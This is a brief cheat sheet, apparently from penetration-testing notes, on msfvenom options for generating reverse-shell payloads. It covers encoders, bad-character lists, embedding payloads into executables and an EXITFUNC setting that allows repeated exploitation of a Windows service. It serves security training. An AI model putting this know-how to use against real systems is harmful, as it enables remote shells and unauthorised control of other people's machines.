msfvenom
is an executable from Metasploit that helps generate payloads in numerous formats (ELF, PE, shellcode, PowerShell, etc) for binary exploitation, client-side attacks, and many more purposes.
Usage
msfvenom <options...>
-p <payload> <options>
, i.e.-p windows/shell_reverse_tcp LHOST=...
LHOST=<local ip>
LPORT=8888
EXITFUNC=thread
(to exit gracefully with ExitThread method)
-f <format>
: payload output format, i.e.c
orpy
styled string orexe
/elf
for binary-v <varname>
: specify a variable name used in shellcode string output-e <encoder>
: encoder for the payload, i.e.-e x86/shikata_ga_nai
-i <iters>
: number of iterations to encode-b <badchars>
: specify bad characters, i.e.-b "\x00\x0a\x0d\x25\x26\x2b\x3d"
-x <embedfile>
: file / executable to embed payload into
Examples
Windows
This snippet is intended for use with Windows buffer overflow on a threaded application over HTTP & TCP.
- Change LHOST IP address in the snippet
- Start listener / handler on 8888
Set EXITFUNC on threaded servers/applications!
ExitThread enables reexploitation of the same service instance. Otherwise, the service will crash after the first try of exploitation.
Linux
This snippet generates a generic reverse shell shellcode in Python (e.g. for exploit development).
- Change LHOST IP
- Start listener on 8888.